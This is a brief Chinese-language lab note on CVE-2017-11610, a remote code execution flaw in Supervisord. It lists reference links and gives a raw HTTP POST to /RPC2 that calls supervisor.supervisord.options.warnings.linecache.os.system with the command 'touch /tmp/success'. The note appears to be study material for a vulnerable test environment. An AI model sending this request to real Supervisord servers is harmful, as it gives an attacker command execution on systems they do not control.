实验环境和介绍 Supervisord 远程代码执行漏洞_视频教程_i春秋_培育信息时代的安全感! (ichunqiu.com) 参考 https://blogs.securiteam.com/index.php/archives/3348 https://www.leavesongs.com/PENETRATION/supervisord-RCE-CVE-2017-11610.html https://github.com/phith0n/vulhub/tree/master/supervisor/CVE-2017-11610 burp
POST /RPC2 HTTP/1.1
Host: localhost
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 213



supervisor.supervisord.options.warnings.linecache.os.system


touch /tmp/success